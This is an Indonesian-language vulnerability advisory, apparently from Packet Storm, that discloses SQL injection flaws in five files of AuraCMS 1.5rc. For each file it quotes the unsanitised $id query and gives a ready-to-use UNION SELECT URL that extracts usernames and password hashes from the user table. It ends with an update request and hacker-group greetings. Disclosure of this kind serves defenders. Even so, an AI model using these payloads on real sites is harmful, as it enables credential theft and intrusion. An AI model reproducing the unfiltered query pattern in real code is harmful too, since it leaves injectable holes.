auracms15-sql.txt

2007-09-09T00:00:00
ID PACKETSTORM:59182
Type packetstorm
Reporter k1tk4t
Modified 2007-09-09T00:00:00

Description

                                        
                                            `########################################################################  
# AuraCMS version 1.5rc - Multiple Remote SQL Injection Vulnerabilities  
# Vendor : http://www.auracms.org/  
# Ditemukan oleh : k1tk4t - k1tk4t[4t]newhack.org  
# Lokasi : Indonesia -- #newhack[dot]org @ irc.dal.net  
########################################################################  
  
// Kutu pada berkas 'hal.php' baris-7  
$perintah="SELECT * FROM halaman WHERE id=$id";  
$hasil = mysql_query( $perintah );  
--> $id tidak ter'filter'sebelumnya dengan baik, sehingga pengguna dapat memanipulasi SQL melalui browser  
Contoh;  
http://localhost/auracms15/?pilih=hal&id=-9%20UNION%20SELECT%200,user,password%20from%20user/*  
  
  
// Kutu pada berkas 'cetak.php' baris-7  
$perintah="SELECT * FROM artikel WHERE id=$id AND publikasi=1";  
$hasil = mysql_query( $perintah );  
--> $id tidak ter'filter'sebelumnya dengan baik, sehingga pengguna dapat memanipulasi SQL melalui browser  
Contoh;  
http://localhost/auracms15/cetak.php?id=-9%20UNION%20SELECT%20null,null,null,password,null,user,null,null%20from%20user/*  
  
  
// Kutu pada berkas 'lihat.php' baris-7  
$perintah="SELECT * FROM artikel WHERE id=$id AND publikasi=1";  
$hasil = mysql_query( $perintah );  
--> $id tidak ter'filter' sebelumnya dengan baik, sehingga pengguna dapat memanipulasi SQL melalui browser  
Contoh;  
http://localhost/AuraCMS1.5/?pilih=lihat&id=-9%20UNION%20SELECT%20null,user,password,null,null,null,null,null%20from%20user/*  
  
  
// Kutu pada berkas 'pesan.php' baris-7  
$perintah="SELECT * FROM artikel WHERE id=$id AND publikasi=1";  
} else {  
$perintah="SELECT * FROM komentar WHERE id=$id";  
--> $id tidak ter'filter' sebelumnya dengan baik, sehingga pengguna dapat memanipulasi SQL melalui browser  
Contoh;  
http://localhost/AuraCMS1.5/?pilih=pesan&id=-9%20UNION%20SELECT%20null,null,null,concat(user,0x3a,password),null,null,null,null%20from%20user/*  
  
  
// Kutu pada berkas 'teman.php' baris-6  
$perintah="SELECT * FROM artikel WHERE id=$id AND publikasi=1";  
$hasil = mysql_query( $perintah );  
--> $id tidak ter'filter' sebelumnya dengan baik, sehingga pengguna dapat memanipulasi SQL melalui browser  
Contoh;  
http://localhost/AuraCMS1.5/?pilih=teman&id=-9%20UNION%20SELECT%20null,concat(user,0x3a,password),null,null,null,null,null,null%20from%20user/*  
  
  
########################################################################  
  
!!! Mohon maaf untuk webadmin mohon di update ke AuraCMS versi terbaru !!!   
  
########################################################################  
Terimakasih untuk;  
str0ke, DNX  
xoron,iFX,x-ace,nyubi,arioo,selikoer,k1ngk0ng,aldy_BT,adhietslank  
dan semua temen2 komunitas security&hacking  
-----------------------  
-newhack[dot]org|staff-  
mR.opt1lc ,fusion,fl3xu5,PusHm0v,Ghoz,bius,iind_id,slackX  
-----------------------  
all member newhack[dot]org  
-----------------------  
all member www.echo.or.id  
-----------------------  
all member www.yogyafree.net  
-----------------------  
all member www.sekuritionline.net  
-----------------------  
all member www.kecoak-elektronik.net  
-----------------------  
semua komunitas hacker&security Indonesia  
Cintailah Bahasa Indonesia  
`